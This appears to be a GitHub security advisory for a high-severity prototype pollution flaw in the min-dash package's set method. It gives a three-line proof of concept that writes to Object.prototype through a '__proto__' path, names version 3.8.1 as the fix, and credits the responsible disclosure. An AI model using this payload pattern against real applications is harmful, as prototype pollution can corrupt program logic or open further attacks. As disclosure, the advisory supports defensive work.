The set method is vulnerable to prototype pollution with specially crafted inputs.
// insert the following into poc.js and run node poc,js (after installing the package)
let parser = require("min-dash");
parser.set({}, [["__proto__"], "polluted"], "success");
console.log(polluted);
min-dash>=3.8.1 fix the issue.
No workarounds exist for the issue.
Closed via https://github.com/bpmn-io/min-dash/pull/21.
Credits to Cristian-Alexandru STAICU who found the vulnerability and to Idan Digmi from the Snyk Security Team who reported the vulnerability to us, responsibly.
{
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-01-27T23:11:40Z",
"nvd_published_at": null,
"severity": "HIGH"
}